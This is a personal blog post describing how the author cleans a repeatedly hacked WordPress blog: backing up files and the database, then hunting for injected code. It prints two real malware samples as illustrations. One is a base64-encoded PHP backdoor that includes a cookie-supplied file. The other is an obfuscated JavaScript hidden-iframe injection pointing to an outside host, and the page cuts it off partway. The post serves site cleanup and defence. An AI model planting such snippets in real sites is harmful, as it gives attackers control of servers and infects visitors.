Talking about WordPress.
The last time my blog was hacked was… let me remember… uh… yesterday.
But hackers know my blog since quite a long ago and they even made my blog be marked by Google as a site that may harm your computer.
Never mind, all these attacks gave me some experience about the typical WordPress hack.
So, when you realize your blog has been hacked, follow these steps:
Backup your ftp content
Simply open your favorite FTP client and download all the content of your site
Backup your MySQL database
Every decent hosting plan now supports PhpMyAdmin. With this tool you can export and save your entire database in a matter of seconds (or minutes, according to the size of your DB).
Look at this picture:
with your WP database selected, click on Export (1)
Then this is the next page:
remember to:
1) Have all tables selected
2) Select SQL as database type
3) Check Structure
, Add IF NOT EXISTS
and Enclose table and field names with backquotes
. Leave unchecked Add AUTO_INCREMENT value
because WP tables already have an auto increment column
4) Check Data
, Complete inserts
, Extended inserts
and Use hexadecimal for BLOB
5) Check Save as file
and None
. Choosing zipped
can be too CPU intensive for your hosting plan
Hunt for the virus
I experienced two types of viruses, both with inserted code into my WP files.
The first one is Php code inserted in one page, like this one
eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbInNoIl0pKXtpbmNsdWRlKCRfQ09PS0lFWyJzaCJdKTtleGl0O30='));
that once evaluated is
if(isset($_COOKIE["sh"])){include($_COOKIE["sh"]);exit;}
The second one is a javascript code inserted in one page, like this one
var OymMAWPnBMGWAGuoPiVY = "q60q105q102q114q97q109q101q32q119q105q100q116q104q61q34q52q56q48q34q32q104q101q105q103q104q116q61q34q54q48q34q32q115q114q99q61q34q104q116q116q112q58q47q47q105q108q111q118q101q104q97q115q104q46q99q110q47q114q97q115q116q97q116q100q115q47q103q111q46q112q104q112q63q115q105q100q61q53q34q32q115q116q121q108q101q61q34q98q111q114q100q101q114q58q48q112q120q59q32q112q111q115q105q116q105q111q110q58q114q101q108q97q116q105q118q101q59q32q116q111q112q58q48q112q120q59q32q108q101q102q116q58q45q53q48q48q112q120q59q32q111q112q97q99q105q116q121q58q48q59q32q102q105q108q116q101q114q58q112q114q111q103q105q100q58q68q88q73q109q97q103q101q84q114q97q110q115q102q111q114q109q46q77q105q99q114q111q115q111q102q116q46q65q108q112q104q97q40q111q112q97q99q105q116q121q61q48q41q59q32q45q109q111q122q45q111q112q97q99q105q116q121q58q48q34q62q60q47q105q102q114q97q109q101q62";var LtBVGDCUsUSHTFUTcjHd = OymMAWPnBMGWAGuoPiVY.split("q");var wOAwUuljcGInzJIGNLaG = "";for (var gtNzyhTaRbENpEKKzvub=1; gtNzyhTaRbENpEKKzvub
that once evaluated returns
I got some more similar codes injected in my pages, but all of them have been inserted at the end of the page, in the last row.
So you should search for eval
or document.write
and see if there are strange strings like the ones I got.
Then, delete or comment them and you should have your blog cleaned and virus-free
I am thinking about making a plugin doing all this hard work for you, at the moment the only one existing seems to be WordPress Exploit Scanner but I would like something more complete.
Never miss an update! Subscribe, and I will bother you by email only when a new game or full source code comes out.